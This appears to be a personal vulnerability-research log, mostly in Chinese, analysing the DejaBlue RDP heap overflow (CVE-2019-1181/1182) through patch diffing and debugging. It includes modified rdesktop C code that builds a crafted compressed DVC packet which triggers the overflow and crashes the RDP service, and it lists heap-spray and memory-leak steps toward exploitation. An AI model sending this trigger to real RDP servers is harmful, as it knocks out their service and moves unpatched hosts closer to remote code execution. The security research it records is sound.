DejaBlue === <center> ![](https://i.imgur.com/it2vUXe.png =800x) </center> CVE-2019-1181 & CVE-2019-1182 實驗虛擬機:Windows 10 Version 1809 for x64-based Systems 根據微軟該漏洞更新報告抓取更新包,根據版本抓取4511553更新檔 :link: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181 - 這個是一個提權漏洞 - 主要漏洞發生在遠端桌面協定(Remote Desktop Protocol,RDP)的<font color=red>動態虛擬通道(Dynamic virtual channels,DVC)</font>傳送資料過程 - 主要漏洞存在動態鏈結檔<font color=red>rdpbase.dll</font> - 主要漏洞內容是計算上的邏輯漏洞 ###### tags: `Vul Research` ## 簡述 [微軟官方公告](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182) :point_left: <font size=4 color=brown>**CVE-2019-1181 & CVE-2019-1182 | Remote Desktop Services Remote Code Execution Vulnerability**</font> <font color=brown>Security Vulnerability</font> <font size=2>Published: 08/13/2019 MITRE CVE-2019-1181 / CVE-2019-1181</font> A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could <font color=blue>execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights</font>. To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP. The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests. ## 靜態分析(觀察) - BinDiff - 使用BinDiff分析更新前後差異,藉以定位漏洞發生的函式 ![](https://i.imgur.com/roV3WdW.png) - 可以發現函式流程有一個區塊有明顯差異 ![](https://i.imgur.com/5HAYcOt.png =400x) - IDA - 細看該區塊內容 - 更新前 ![](https://i.imgur.com/sficIgx.png =400x) - 更新後 ![](https://i.imgur.com/k2X8tWB.png =400x) - 可以看到更新後對 `eax+0x2000` 的size檢查更嚴格,會判斷 `eax+0x2000` 是否會大於 `edx` - 對於無號整數位於`0xffffe000 < size < 0xffffffff`時,`0 < size+0x2000 < 0x2000` - 從Patch後的檔案可以看到更新邏輯為若 `size>size+0×2000` 時,new(-1)後續函式邏輯直接return - 整體漏洞發生邏輯在於後方會引用memcpy ![](https://i.imgur.com/9eHMSxW.png =400x) 如圖所示,可以看到函式後方引用memcpy,第一個參數dest指向前方new所分配的記憶體空間。如果此時 `0xffffe000 < DecompressedSize < 0xffffffff` 的一個值,當 `DecompressedSize + 0x2000` 後將會小於原本的大小,此時如果buf還是原本大小,會導致memcpy覆蓋掉dest後方的 `buf-(DecompressedSize + 0x2000)` 個byte,如果後面空間又是用來記錄指標,就可以透用覆蓋更改指標內容,藉以控制程式流程。 ## 動態分析(驗證) ### 作法一 參考:https://bbs.pediy.com/thread-255728.htm 只要試圖模擬攻擊一次,再動態追蹤記憶體狀況,應該就可以初步確認漏洞的可控程度 - 構造DVC封包使其資料可以成功覆蓋到其他Heap指標,造成記憶體錯誤 - 觀察記憶體錯誤是因為讀取錯誤還是執行錯誤,攸關之後漏洞利用的程度 <u>想法:用來打一次Win10,錄封包確認連線失敗的點在哪邊,再回過頭看PoC,定位要修改的點</u> <font size=4>**下載並執行CVE-2019-0708的PoC**</font> 因為此PoC是用來攻擊Win7的作業系統,但根據[參考文章](https://bbs.pediy.com/thread-255728.htm)猜測其RDP的連線初始化應該是相同的 執行前須先安裝相關套件 ```python= ImportError: No module named OpenSSL > sudo pip install pyOpenSSL ....... ....... ImportError: No module named impacket.structure > sudo apt-get install -y python-impacket ....... ....... ``` 執行後發現有編號104的錯誤 ![](https://i.imgur.com/HfZZdpq.png =500x) 造成原因可能是 - RDP協定的一些規則? - GroomBase不對 ### 作法二 參考:https://bbs.pediy.com/thread-256766.htm 在ubuntu18.04的環境下載[rdesktop的壓縮檔](https://github.com/rdesktop/rdesktop/releases/download/v1.9.0/rdesktop-1.9.0.tar.gz) :point_left: 要裝一堆東西,詳見<u>附錄</u> 將dvc.c的檔案更改如下(共三個區塊) - dvc_init函式中註冊一個收到的DVC Create Request PDU中request的channel (7行) ```clike= dvc_init() { memset(channels, 0, sizeof(channels)); dvc_channel = channel_register("drdynvc", CHANNEL_OPTION_INITIALIZED | CHANNEL_OPTION_ENCRYPT_RDP, dvc_process_pdu); dvc_channels_register("Microsoft::Windows::RDS::Telemetry",dvc_process_pdu); return (dvc_channel != NULL); } ``` - 在dvc_send_create_response函式之後增加發送DVC Data First Compressed PDU的dvc_send_first_compressed函式 (20行) ```clike= static void dvc_process_create_pdu(STREAM s, dvc_hdr_t hdr) { char name[512]; uint32 channelid; channelid = dvc_in_channelid(s, hdr); in_ansi_string(s, name, sizeof(name)); logger(Protocol, Debug, "dvc_process_create(), server requests channelid = %d, name = '%s'", channelid, name); if (dvc_channels_exists(name)) { logger(Core, Verbose, "Established dynamic virtual channel '%s'", name); dvc_channels_set_id(name, channelid); dvc_send_create_response(True, hdr, channelid); dvc_send_first_compressed(hdr,channelid); } else { dvc_send_create_response(False, hdr, channelid); } } ``` - 構造dvc_send_first_compressed函式 (New) ```clike= static void dvc_send_first_compressed(dvc_hdr_t hdr, uint32 channelid) { STREAM s; logger(Protocol, Debug, "dvc_send_first_compressed() channelid %d", channelid); hdr.hdr.cmd = DYNVC_DATA_FIRST_COMPRESSED; s = dvc_init_packet(hdr, channelid, 22); out_uint8(s,0x00); //length out_uint8(s,0x00); out_uint8(s,0x00); out_uint8(s,0x00); //RDP_SEGMENTED_DATA out_uint8(s, 0xe1); //descriptor out_uint16(s, 0x01); //segmentCount out_uint32(s, 0xffffe001); //uncompressedSize //RDP_DATA_SEGMENT out_uint32(s, 0x07); //size //RDP_BULK_ENCODED_DATA out_uint8(s, 0x26); //header out_uint8(s, 0x38); //data out_uint8(s, 0xc4); //data out_uint8(s, 0x3f); //data out_uint8(s, 0xf4); //data out_uint8(s, 0x74); //data out_uint8(s, 0x01); //data s_mark_end(s); channel_send(s, dvc_channel); s_free(s); } ``` 可以看到在執行`add eax,2000h`前的rax為`0xffffe001` <font color=red> (`0xffffe001`為uncompressedSize的值) </font> ![](https://i.imgur.com/f4YP4Qs.png) 執行後產生溢位 ![](https://i.imgur.com/hvliFmU.png) 將斷點下在memcpy附近,可以看得解壓所出來的資料 而該封包解壓縮出來是1595bytes的q(0x71) ![](https://i.imgur.com/UBvnW8x.png) 接著確認是否會調用到被覆蓋成`0x71`的資料 ## 結論 <font color=red size=5>目前只能做到中止C方無法正常RDP</font> <font color=red size=5>或者A方無法成功RDP,好像沒到藍屏...</font> ![](https://i.imgur.com/6lwV7NI.png) <font color=red size=4>網路上看到的分析報告都是終止該服務~好像沒到藍屏更沒有看到RCE</font> What are the next steps? - Determine which heap our vulnerable chunk is in (Segment/NT) - Determine which component uses the chunk to make the allocation (LFH/VS/etc.) - Find a way to make a heap spray - Find a way to leak memory ## 附錄 #### 手把手裝RDESKTOP 下載 ``` $ wget https://github.com/rdesktop/rdesktop/releases/download/v1.9.0/rdesktop-1.9.0.tar.gz ``` 解壓縮並進入目錄中 ``` $ gzip -d rdesktop-1.9.0.tar.gz $ cd rdesktop-1.9.0 ``` 瘋狂安裝套件(如果有漏掉,在`./configure`時會說缺什麼套件,再找一下套件名安裝即可) ``` $ sudo apt-get install build-essential libx11-dev libssl-dev libgssglue-dev libpcsclite-dev $ sudo apt-get install -y pkg-config $ sudo apt install libxcursor1 $ sudo apt install libtasn1-6-dev $ sudo apt install libgnutls28-dev $ sudo apt-get install libgssglue-dev $ sudo apt-get install libgssglue1 $ sudo apt-get install libgssapi-krb5-2 $ sudo apt-get install libgssapi3-heimdal $ sudo apt install libxcursor1 $ sudo apt install libxcursor-dev ``` 安裝 ``` $ ./configure --disable-credssp $ make $ sudo make install ``` 連線 ``` $ RDESKTOP_DEBUG=Protocol ./rdesktop [IP ADDRESS] ``` ## 研究紀錄 ```mermaid gantt title Research Progress section 資訊統整 資料整理 :a1, 2020-03-19, 2d section 靜態分析 資料蒐整 :a2, 2020-03-21, 3d 原始碼靜態分析 :a3,2020-03-21, 14d section 動態分析 資料蒐整 :2020-03-31 , 6d 環境架設 :2020-03-31 , 10d 動態分析 :a4,2020-04-06, 24d section 資料整理 資料整理 :after a4,2d ``` **卡關記錄** >2020-04-04RDESKTOP裝不起來 >Solution : 安裝新的Ubuntu虛擬機環境,並安裝相關套件,詳細記錄於附件 >2020-04-06動態分析無法觸發漏洞 >Solution : 攻擊的封包格式有誤,重新改原始碼 ## 參考文章 - [1] [Windows远程桌面服务的远程代码执行漏洞(CVE-2019-1182)分析](https://bbs.pediy.com/thread-255728.htm) - [2] [Dejablue Vulnerabilities in Windows 7 to Windows 10](https://securityboulevard.com/2020/02/dejablue-vulnerabilities-in-windows-7-to-windows-10-cve-2019-1181-and-cve-2019-1182/) - [3] [DejaBlue: Analyzing a RDP Heap Overflow](https://www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html) - [4] [DejaBlue(CVE-2019-1181/1182) Windows RDP漏洞分析](https://bbs.pediy.com/thread-256766.htm)